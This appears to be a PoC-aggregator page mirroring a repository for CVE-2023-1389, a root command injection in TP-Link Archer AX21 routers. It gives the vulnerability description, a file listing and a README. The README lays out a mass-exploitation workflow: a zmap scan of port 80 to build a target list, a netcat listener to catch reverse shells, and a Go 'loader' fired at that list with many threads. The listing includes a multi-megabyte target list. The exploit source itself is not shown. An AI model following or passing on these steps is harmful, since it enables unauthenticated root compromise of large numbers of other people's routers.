CVE-2023-1389 PoC — TP-LINK Archer AX21 命令注入漏洞

Source

https://github.com/werwolfz/CVE-2023-1389

Associated Vulnerability

Title:TP-LINK Archer AX21 命令注入漏洞 (CVE-2023-1389)
Description:TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

Description

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]

Readme

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader POC]
# CVE-2023-1389
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date Found : 07/25/2023
# Exploit Author: Voyag3r


```
How to Use :-

*Scanning*
- Use Zmap  : zmap -p 80 -o list.txt 

*NetCat Listener
- apt install netcat -y
- nc lnvp <port>

*Loader
- go run . --host=<netcat_listener_ip> --port=<netcat_listener_port> --list=list.txt --threads=<threads>

* Logging
- Error : Webserver Inactive or unresponsive
- Success : Payload Sent with Request Code 200
- Status : Response Code
```

File Snapshot


 [4.0K]  /data/pocs/06ebf01b5f4f9a7cf64d5e5e0aaefdeb29c54eea
├── [ 142]  go.mod
├── [ 340]  go.sum
├── [5.8M]  list.txt
├── [1.8K]  main.go
└── [ 585]  README.md

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!